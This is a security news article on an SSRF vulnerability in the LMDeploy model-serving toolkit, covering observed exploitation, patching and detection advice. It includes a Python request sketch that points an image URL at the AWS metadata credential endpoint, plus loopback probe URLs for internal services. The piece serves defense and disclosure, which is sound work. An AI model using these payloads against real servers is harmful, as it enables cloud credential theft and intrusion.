PROBABLYPWNED
Vulnerabilities · April 24, 2026 · 4 min read

LMDeploy SSRF Exploited 12 Hours After Disclosure

CVE-2026-33626 in LMDeploy AI toolkit was weaponized within 12 hours of publication, targeting AWS credentials and internal services. Patch to v0.12.3 immediately.

Marcus Chen

Attackers needed just 12 hours and 31 minutes to weaponize a critical vulnerability in LMDeploy, a toolkit for deploying large language models developed by Shanghai AI Laboratory. Sysdig researchers observed active exploitation beginning April 22, 2026 at 03:35 UTC—barely half a day after the security advisory went public.

The vulnerability, tracked as CVE-2026-33626, is a Server-Side Request Forgery (SSRF) flaw in LMDeploy's vision-language image loading functionality. It carries a CVSS score of 7.5 (High) and affects all versions prior to 0.12.3.

The Root Cause

The flaw exists in the load_image() function within lmdeploy/vl/utils.py. When processing vision-language model requests, the function fetches image URLs from API requests without validating whether they point to internal or private network addresses. Attackers can force the server to request arbitrary URLs—including cloud metadata services, internal databases, and administrative interfaces—and return their contents.

The absence of scheme or host validation means no protection exists against link-local addresses (169.254.0.0/16), loopback (127.0.0.0/8), or RFC 1918 private ranges. Any attacker who can send a chat completion request to an exposed LMDeploy instance can access internal resources.
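The missing check is straightforward to sketch. The following is an illustrative example of the kind of scheme and host validation the function lacked, built on Python's standard library; the function name and exact policy are this article's assumptions, not the actual v0.12.3 patch:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_image_url(url: str) -> bool:
    """Reject URLs that resolve to loopback, link-local, or RFC 1918 space.

    Illustrative sketch only -- not the actual fix shipped in LMDeploy v0.12.3.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False  # blocks file://, gopher://, etc.
    host = parsed.hostname
    if host is None:
        return False
    try:
        # Resolve the hostname: an attacker can hide an internal IP behind DNS.
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        if addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_reserved:
            return False
    return True
```

With a check like this in place, `http://169.254.169.254/...` and `http://127.0.0.1:6379/` are rejected before any request is made; note that resolving the hostname first also defeats DNS-based rebinding of a public name to an internal address.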

Observed Exploitation

Sysdig captured an 8-minute attack session demonstrating methodical reconnaissance:

Phase 1: AWS Credential Theft
The attacker targeted the AWS Instance Metadata Service at 169.254.169.254/latest/meta-data/iam/security-credentials/, attempting to extract IAM credentials. A successful request here returns temporary access keys with whatever permissions the EC2 instance role allows.
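The attacker's request likely looked something like the following sketch. The endpoint path, port, and model id are assumptions based on LMDeploy's OpenAI-compatible API; only the IMDS URL comes from the observed attack:

```python
import json
import urllib.request

TARGET = "http://victim-lmdeploy:23333/v1/chat/completions"  # hypothetical host
IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

payload = {
    "model": "vision-model",  # placeholder model id
    "messages": [{
        "role": "user",
        "content": [
            {"type": "text", "text": "Describe this image."},
            # The server-side load_image() fetches this URL with no host check,
            # so the IMDS response comes back inside the chat completion.
            {"type": "image_url", "image_url": {"url": IMDS}},
        ],
    }],
}
req = urllib.request.Request(
    TARGET,
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"},
)
# urllib.request.urlopen(req)  # not executed here; shown for request shape only
```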

Phase 2: Connectivity Confirmation
Using an out-of-band DNS callback to cw2mhnbd.requestrepo.com, the attacker confirmed egress capability before enumerating API endpoints via /openapi.json.

Phase 3: Internal Service Discovery
The attacker probed localhost ports systematically:

  • Port 6379 (Redis)
  • Port 3306 (MySQL)
  • Port 8080 (administrative interfaces)
  • Port 80 (web services)

The traffic originated from IP 103.116.72.119, associated with Hong Kong-based ASN 400618 (Prime Security Corp.). This type of systematic probing is typical of initial access operations—gather credentials, map internal services, and prepare for deeper compromise.
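Through the same image_url channel, each probe is just another internal URL. A sketch of how the observed port list maps to SSRF targets (the dictionary labels mirror Sysdig's capture; the URL construction is illustrative):

```python
# Localhost ports probed in phase 3, per Sysdig's capture.
PROBED_PORTS = {6379: "Redis", 3306: "MySQL", 8080: "admin interface", 80: "web"}

# Each probe is simply an image URL pointing at the loopback interface;
# the vulnerable server fetches it and returns any HTTP response or error
# banner, letting the attacker fingerprint what is listening.
probe_urls = [f"http://127.0.0.1:{port}/" for port in PROBED_PORTS]
```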

Who's Affected

Any organization running LMDeploy versions prior to 0.12.3 with exposed API endpoints is vulnerable. The toolkit is popular for serving vision-language and text LLMs, particularly in:

  • AI research environments
  • Production ML inference pipelines
  • Cloud-hosted model serving infrastructure

The risk is highest for cloud deployments where IMDS access could expose IAM credentials. Organizations running LMDeploy on AWS, GCP, or Azure should treat this as an emergency patch.

Immediate Actions

  1. Update to LMDeploy v0.12.3 - The patched version adds URL validation
  2. Enforce IMDSv2 - Set httpTokens=required and httpPutResponseHopLimit=1 on EC2 instances
  3. Rotate credentials - Any IAM roles on affected deployments should have credentials rotated
  4. Restrict egress - Limit VPC/security group egress to only necessary endpoints (S3, GCS, logging)
  5. Bind internal services - Ensure Redis and MySQL listen only on private interfaces with authentication
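Step 2 can be scripted with the AWS SDK. The sketch below assumes boto3 and EC2 permissions on the operator's workstation; `imds_v2_options` and `enforce_imds_v2` are hypothetical helper names, but the `modify_instance_metadata_options` parameters are the documented ones:

```python
def imds_v2_options(instance_id: str) -> dict:
    """Build the ModifyInstanceMetadataOptions parameters that force IMDSv2."""
    return {
        "InstanceId": instance_id,
        "HttpTokens": "required",      # reject token-less IMDSv1 requests
        "HttpPutResponseHopLimit": 1,  # stop one-hop forwarding from containers
        "HttpEndpoint": "enabled",
    }

def enforce_imds_v2(instance_id: str) -> None:
    import boto3  # third-party AWS SDK, assumed installed
    ec2 = boto3.client("ec2")
    ec2.modify_instance_metadata_options(**imds_v2_options(instance_id))
```

With `HttpTokens` set to `required`, a simple SSRF GET against 169.254.169.254 fails, because IMDSv2 demands a session token obtained via a prior PUT request, which the vulnerable image loader cannot issue.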

Detection Rules

Sysdig recommends deploying Falco rules to detect SSRF attempts:

  • "Contact EC2 Instance Metadata Service From Container"
  • "Contact GCP Instance Metadata Service From Container"
  • Cloud-provider variants for Azure and ECS/Fargate

Network monitoring should alert on connections to link-local, RFC 1918, or loopback addresses from inference processes.
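That monitoring rule reduces to a destination-address check. A minimal sketch using Python's standard library, with the ranges taken from the advisory (`should_alert` is a hypothetical helper, not a Sysdig or Falco API):

```python
import ipaddress

# Destinations an inference process should never contact directly.
BLOCKED = [
    ipaddress.ip_network("127.0.0.0/8"),     # loopback
    ipaddress.ip_network("169.254.0.0/16"),  # link-local, including IMDS
    ipaddress.ip_network("10.0.0.0/8"),      # RFC 1918
    ipaddress.ip_network("172.16.0.0/12"),   # RFC 1918
    ipaddress.ip_network("192.168.0.0/16"),  # RFC 1918
]

def should_alert(dest_ip: str) -> bool:
    """Return True when an outbound connection warrants an SSRF alert."""
    addr = ipaddress.ip_address(dest_ip)
    return any(addr in net for net in BLOCKED)
```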

Why This Matters

Twelve hours from advisory to exploitation is aggressive but not surprising. The vulnerability requires no authentication, was weaponized without any public proof-of-concept code, and affects a tool deployed widely in AI infrastructure. Attackers understand that ML teams often prioritize model performance over infrastructure security—and that AI workloads frequently run with overly permissive cloud credentials.

This follows a pattern we've seen in other critical vulnerabilities affecting developer tools. As AI tooling proliferates, security teams need visibility into what's running in their ML pipelines. You can't patch what you don't know exists.

For organizations building with LLM infrastructure, this incident reinforces why defense-in-depth matters. Even if you'd patched within 24 hours—faster than most organizations manage—you'd have been vulnerable during the exploitation window. Network segmentation, credential scoping, and runtime monitoring remain essential regardless of patch velocity.
